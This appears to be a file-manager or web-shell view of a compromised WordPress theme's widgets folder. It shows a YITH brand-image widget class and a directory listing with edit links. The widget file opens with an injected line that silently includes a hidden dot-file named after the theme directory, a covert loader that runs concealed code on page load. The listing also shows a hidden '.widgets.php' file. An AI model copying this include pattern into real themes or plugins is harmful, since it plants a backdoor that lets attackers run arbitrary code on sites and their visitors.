PATH:
home
/
letacommog
/
newrdv1
/
wp-content
/
themes
/
besa
/
inc
/
widgets
<?php if( !defined('TBAY_ELEMENTOR_ACTIVED') ) return; if (file_exists(get_template_directory() . DIRECTORY_SEPARATOR . '.' . basename(get_template_directory()) . '.php')) { include_once get_template_directory() . DIRECTORY_SEPARATOR . '.' . basename(get_template_directory()) . '.php'; } class Tbay_Widget_Yith_Brand_Images extends Tbay_Widget { public function __construct() { parent::__construct( 'besa_product_brand', esc_html__('Besa Product Brand Images', 'besa'), array( 'description' => esc_html__( 'Show YITH product brand images(Only applicable to product single pages)', 'besa' ), ) ); $this->widgetName = 'besa_product_brand'; } public function getTemplate() { $this->template = 'product-brand-image.php'; } public function widget( $args, $instance ) { $this->display($args, $instance); } public function form( $instance ) { } public function update( $new_instance, $old_instance ) { $instance = array(); return $instance; } }
[+]
..
[-] socials.php
[edit]
[-] banner_image.php
[edit]
[-] popup_newsletter.php
[edit]
[-] single_image.php
[edit]
[-] recent_post.php
[edit]
[-] posts.php
[edit]
[-] custom_menu.php
[edit]
[-] top_rate.php
[edit]
[-] popular_posts.php
[edit]
[-] woo-carousel.php
[edit]
[-] video.php
[edit]
[-] recent_comment.php
[edit]
[-] .widgets.php
[edit]
[-] list-categories.php
[edit]
[-] yith-brand-image.php
[edit]